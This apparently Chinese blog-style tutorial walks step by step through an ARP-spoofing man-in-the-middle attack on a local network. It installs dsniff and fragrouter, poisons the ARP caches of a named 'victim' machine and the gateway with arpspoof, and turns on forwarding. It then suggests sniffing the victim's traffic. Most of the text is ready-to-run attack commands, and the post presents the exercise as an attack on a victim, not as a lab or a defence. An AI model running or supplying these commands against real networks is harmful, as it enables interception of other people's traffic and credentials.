假设系统是ubuntu 9.10，网络情况：路由ip：172.16.86.254 我的电脑ip：172.16.86.2 受害者ip：172.16.86.3

主要用到的工具有2个，一个是Dsniff，还有一个是 fragrouter。

安装Dsniff

    sudo apt-get install dsniff

安装 fragrouter

在/etc/apt/sources.list 文件中添加源:

deb http://cz.archive.ubuntu.com/ubuntu hardy main universe

再执行

    sudo apt-get install fragrouter

ARP欺骗

欺骗172.16.86.3，告诉172.16.86.3，网关172.16.86.254的MAC地址是本机的MAC地址：

    sudo arpspoof -t 172.16.86.3 172.16.86.254 

欺骗网关，告诉网关，172.16.86.3的MAC地址是本机的MAC地址：

    sudo arpspoof -t 172.16.86.254 172.16.86.3 

ARP数据包广播之后，网关和受害机之间的数据交流就都需要经过我的机器了

设置转发,让受害机与网关的通信正常：

    $ sudo echo 1 >/proc/sys/net/ipv4/ip_forward
    $ fragrouter -B1

接下来就可以嗅探数据咯，还不会用Dsniff的TX去网上搜索一些资料看看，或者转用WireShark的GUI工具抓包……